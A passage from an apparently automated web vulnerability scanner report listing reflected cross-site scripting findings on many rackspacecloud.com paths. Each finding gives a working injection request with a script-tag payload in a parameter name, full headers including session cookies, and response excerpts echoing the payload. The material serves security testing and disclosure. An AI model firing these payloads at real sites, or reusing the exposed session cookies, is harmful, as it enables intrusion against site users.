The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 26e8c"><script>alert(1)</script>cc34e1bf5d3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /cloud_hosting_demos?26e8c"><script>alert(1)</script>cc34e1bf5d3=1 HTTP/1.1 Host: www.rackspacecloud.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; chatslidercookie=invitesent; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; _MyGoogleTracker=(direct); s_cc=true; IS3_History=1296860233-7-2_4--7+6--7_42456-1---1296919229_4-6_4-6; IS3_GSV=DPL-2_TES-1296919127_PCT-1296920684_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=D; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.10.10.1296919128;
Response (redirected)
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:09:30 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Content-Length: 39978
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
4.203. http://www.rackspacecloud.com/cloud_hosting_demos/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.rackspacecloud.com
Path:
/cloud_hosting_demos/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab4a7"><script>alert(1)</script>a4f15b11e6d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /cloud_hosting_demos/?ab4a7"><script>alert(1)</script>a4f15b11e6d=1 HTTP/1.1 Host: www.rackspacecloud.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; chatslidercookie=invitesent; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; _MyGoogleTracker=(direct); s_cc=true; IS3_History=1296860233-7-2_4--7+6--7_42456-1---1296919229_4-6_4-6; IS3_GSV=DPL-2_TES-1296919127_PCT-1296920684_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=D; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.10.10.1296919128;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:09:23 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Content-Length: 40038
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
4.204. http://www.rackspacecloud.com/cloud_hosting_faq/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.rackspacecloud.com
Path:
/cloud_hosting_faq/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff8ce"><script>alert(1)</script>e3563e031c6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /cloud_hosting_faq/?ff8ce"><script>alert(1)</script>e3563e031c6=1 HTTP/1.1 Host: www.rackspacecloud.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; chatslidercookie=invitesent; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; _MyGoogleTracker=(direct); s_cc=true; IS3_History=1296860233-7-2_4--7+6--7_42456-1---1296919229_4-6_4-6; IS3_GSV=DPL-2_TES-1296919127_PCT-1296920684_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=D; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.10.10.1296919128;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:09:23 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Content-Length: 66230
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
4.205. http://www.rackspacecloud.com/cloud_hosting_products/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.rackspacecloud.com
Path:
/cloud_hosting_products/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 348a7"><script>alert(1)</script>7d7a4e11ae2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /cloud_hosting_products/?348a7"><script>alert(1)</script>7d7a4e11ae2=1 HTTP/1.1 Host: www.rackspacecloud.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; chatslidercookie=invitesent; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; _MyGoogleTracker=(direct); s_cc=true; IS3_History=1296860233-7-2_4--7+6--7_42456-1---1296919229_4-6_4-6; IS3_GSV=DPL-2_TES-1296919127_PCT-1296920684_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=D; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.10.10.1296919128;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:09:22 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Content-Length: 36444
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
4.206. http://www.rackspacecloud.com/cloud_hosting_products/files [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.rackspacecloud.com
Path:
/cloud_hosting_products/files
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 51f1d"><script>alert(1)</script>f7c568ebfea was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /cloud_hosting_products/files?51f1d"><script>alert(1)</script>f7c568ebfea=1 HTTP/1.1 Host: www.rackspacecloud.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; chatslidercookie=invitesent; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; _MyGoogleTracker=(direct); s_cc=true; IS3_History=1296860233-7-2_4--7+6--7_42456-1---1296919229_4-6_4-6; IS3_GSV=DPL-2_TES-1296919127_PCT-1296920684_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=D; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.10.10.1296919128;
Response (redirected)
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:09:24 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Content-Length: 41035
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
<head>
<ti ...[SNIP]... ick="track_chat_button('Green Chat Tab');window.open('https://admin.instantservice.com/Customer?ai=7513&di=39941&email=a@a.com&optionaldata2=http://www.rackspacecloud.com/cloud_hosting_products/files/?51f1d"><script>alert(1)</script>f7c568ebfea=1&optionaldata3=loginpg&optionaldata4=US1ffb86d7e6309d5032693db6bb0255e1&optionaldata5=http://www.google.com/search?hl=en&q=4e7adeacdad626b79a66169b','custclient','width=500,height=320');return fa ...[SNIP]...
4.207. http://www.rackspacecloud.com/cloud_hosting_products/files/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.rackspacecloud.com
Path:
/cloud_hosting_products/files/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 54bc6"><script>alert(1)</script>525482b039d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /cloud_hosting_products/files/?54bc6"><script>alert(1)</script>525482b039d=1 HTTP/1.1 Host: www.rackspacecloud.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; chatslidercookie=invitesent; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; _MyGoogleTracker=(direct); s_cc=true; IS3_History=1296860233-7-2_4--7+6--7_42456-1---1296919229_4-6_4-6; IS3_GSV=DPL-2_TES-1296919127_PCT-1296920684_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=D; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.10.10.1296919128;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:09:17 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Content-Length: 40978
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
4.208. http://www.rackspacecloud.com/cloud_hosting_products/servers [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.rackspacecloud.com
Path:
/cloud_hosting_products/servers
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4bc42"><script>alert(1)</script>0a01396e3d8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /cloud_hosting_products/servers?4bc42"><script>alert(1)</script>0a01396e3d8=1 HTTP/1.1 Host: www.rackspacecloud.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; chatslidercookie=invitesent; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; _MyGoogleTracker=(direct); s_cc=true; IS3_History=1296860233-7-2_4--7+6--7_42456-1---1296919229_4-6_4-6; IS3_GSV=DPL-2_TES-1296919127_PCT-1296920684_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=D; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.10.10.1296919128;
Response (redirected)
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:09:30 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Content-Length: 43099
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
<head>
<ti ...[SNIP]... k="track_chat_button('Green Chat Tab');window.open('https://admin.instantservice.com/Customer?ai=7513&di=39941&email=a@a.com&optionaldata2=http://www.rackspacecloud.com/cloud_hosting_products/servers/?4bc42"><script>alert(1)</script>0a01396e3d8=1&optionaldata3=loginpg&optionaldata4=US1ffb86d7e6309d5032693db6bb0255e1&optionaldata5=http://www.google.com/search?hl=en&q=4e7adeacdad626b79a66169b','custclient','width=500,height=320');return fa ...[SNIP]...
4.209. http://www.rackspacecloud.com/cloud_hosting_products/servers/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.rackspacecloud.com
Path:
/cloud_hosting_products/servers/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7fcbc"><script>alert(1)</script>8c335d37419 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /cloud_hosting_products/servers/?7fcbc"><script>alert(1)</script>8c335d37419=1 HTTP/1.1 Host: www.rackspacecloud.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; chatslidercookie=invitesent; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; _MyGoogleTracker=(direct); s_cc=true; IS3_History=1296860233-7-2_4--7+6--7_42456-1---1296919229_4-6_4-6; IS3_GSV=DPL-2_TES-1296919127_PCT-1296920684_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=D; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.10.10.1296919128;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:09:19 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Content-Length: 43005
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
4.210. http://www.rackspacecloud.com/cloud_hosting_products/sites [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.rackspacecloud.com
Path:
/cloud_hosting_products/sites
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fe137"><script>alert(1)</script>70d40f8db4e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /cloud_hosting_products/sites?fe137"><script>alert(1)</script>70d40f8db4e=1 HTTP/1.1 Host: www.rackspacecloud.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; chatslidercookie=invitesent; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; _MyGoogleTracker=(direct); s_cc=true; IS3_History=1296860233-7-2_4--7+6--7_42456-1---1296919229_4-6_4-6; IS3_GSV=DPL-2_TES-1296919127_PCT-1296920684_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=D; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.10.10.1296919128;
Response (redirected)
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:09:30 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Content-Length: 40602
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
<head>
<ti ...[SNIP]... ick="track_chat_button('Green Chat Tab');window.open('https://admin.instantservice.com/Customer?ai=7513&di=39941&email=a@a.com&optionaldata2=http://www.rackspacecloud.com/cloud_hosting_products/sites/?fe137"><script>alert(1)</script>70d40f8db4e=1&optionaldata3=loginpg&optionaldata4=US1ffb86d7e6309d5032693db6bb0255e1&optionaldata5=http://www.google.com/search?hl=en&q=4e7adeacdad626b79a66169b','custclient','width=500,height=320');return fa ...[SNIP]...
4.211. http://www.rackspacecloud.com/cloud_hosting_products/sites/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.rackspacecloud.com
Path:
/cloud_hosting_products/sites/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36a07"><script>alert(1)</script>0805f68f0b3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /cloud_hosting_products/sites/?36a07"><script>alert(1)</script>0805f68f0b3=1 HTTP/1.1 Host: www.rackspacecloud.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; chatslidercookie=invitesent; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; _MyGoogleTracker=(direct); s_cc=true; IS3_History=1296860233-7-2_4--7+6--7_42456-1---1296919229_4-6_4-6; IS3_GSV=DPL-2_TES-1296919127_PCT-1296920684_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=D; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.10.10.1296919128;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:09:26 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Content-Length: 40602
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
<head>
<ti ...[SNIP]... ick="track_chat_button('Green Chat Tab');window.open('https://admin.instantservice.com/Customer?ai=7513&di=39941&email=a@a.com&optionaldata2=http://www.rackspacecloud.com/cloud_hosting_products/sites/?36a07"><script>alert(1)</script>0805f68f0b3=1&optionaldata3=loginpg&optionaldata4=US1ffb86d7e6309d5032693db6bb0255e1&optionaldata5=http://www.google.com/search?hl=en&q=4e7adeacdad626b79a66169b','custclient','width=500,height=320');return fa ...[SNIP]...
4.212. http://www.rackspacecloud.com/index.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.rackspacecloud.com
Path:
/index.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13fef"><script>alert(1)</script>ab5bb01d50b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index.php?13fef"><script>alert(1)</script>ab5bb01d50b=1 HTTP/1.1 Host: www.rackspacecloud.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
4.213. http://www.rackspacecloud.com/legal/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.rackspacecloud.com
Path:
/legal/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5cdf8"><script>alert(1)</script>a24f82e1ede was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /legal/?5cdf8"><script>alert(1)</script>a24f82e1ede=1 HTTP/1.1 Host: www.rackspacecloud.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; chatslidercookie=invitesent; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; _MyGoogleTracker=(direct); s_cc=true; IS3_History=1296860233-7-2_4--7+6--7_42456-1---1296919229_4-6_4-6; IS3_GSV=DPL-2_TES-1296919127_PCT-1296920684_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=D; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.10.10.1296919128;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:09:29 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Content-Length: 79832
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
4.214. http://www.rackspacecloud.com/legal/privacystatement/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.rackspacecloud.com
Path:
/legal/privacystatement/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20633"><script>alert(1)</script>c63c78bd6fc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
